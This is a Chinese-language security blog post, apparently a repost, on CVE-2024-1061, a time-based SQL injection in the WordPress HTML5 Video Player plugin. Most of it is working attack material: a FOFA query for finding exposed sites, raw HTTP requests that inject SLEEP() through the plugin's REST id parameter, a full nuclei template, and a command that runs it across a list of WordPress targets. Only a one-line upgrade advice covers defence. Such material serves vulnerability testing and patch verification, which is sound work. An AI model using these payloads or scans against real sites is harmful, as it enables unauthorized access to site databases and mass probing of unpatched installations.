CVE-2024-1061

admin
admin
admin
102367
文章
87
评论
2024年2月4日09:40:07评论50 views字数 2641阅读8分48秒阅读模式

使

01

漏洞名称

WordPress Plugin HTML5 Video Player 安全漏洞

02

漏洞影响

WordPress Plugin HTML5 Video Player 2.5.25之前版本

03

漏洞描述

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。

WordPress Plugin HTML5 Video Player 2.5.25之前版本存在安全漏洞,该漏洞源于通过 get_view 函数中 id 参数发现包含 SQL 注入漏洞。

04

FOFA搜索语句
"wordpress" && body="html5-video-player"

CVE-2024-1061

05

漏洞复现

网站正常访问时间在1秒内,构造POC数据包,使睡眠6秒,然后看响应时间是否大于6秒

GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1Host: 192.168.40.130:112User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

CVE-2024-1061

睡眠时间改为10秒再次请求,看响应时间是否大于10秒

GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+- HTTP/1.1Host: 192.168.40.130:112User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

CVE-2024-1061

漏洞复现成功

06

nuclei poc

poc文件内容如下

id: CVE-2024-1061info:  name: WordPress HTML5 Video Player - SQL Injection  author: xxcdd  severity: high  description: |    WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.  impact: |    Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.  remediation: |    Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.  reference:    - https://www.tenable.com/security/research/tra-2024-02    - https://wordpress.org/plugins/html5-video-player    - https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061  classification:    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N    cvss-score: 8.6    cve-id: CVE-2024-1061    cwe-id: CWE-89  metadata:    verified: true    fofa-query: '"wordpress" && body="html5-video-player"'  tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-playerhttp:  - method: GET    path:      - "{{BaseURL}}/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)--+-"    matchers:      - type: dsl        dsl:          - 'duration>=5 && duration<=7'          - 'contains(header, "application/json")'          - 'contains_all(body, "created_at", "video_id")'        condition: and# digest: 4b0a0048304602210082f5c18e0ac8422e532f5581f775dfd9a57d7c059cf6f41622d7a00306bfa3c6022100d0500ab738261efc3de306be7f8149c4a2f98b4c1560c26fe3617520ce9dd6e9:922c64590222798bb761d5b6d8e72950

运行POC

nuclei.exe -l data/wordpress.txt -t mypoc/cve/CVE-2024-1061.yaml

CVE-2024-1061

07

修复建议

升级到最新版本。

08

原文始发于微信公众号(AI与网安):CVE-2024-1061

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月4日09:40:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-1061http://cn-sec.com/archives/2466613.html

发表评论

匿名网友 填写信息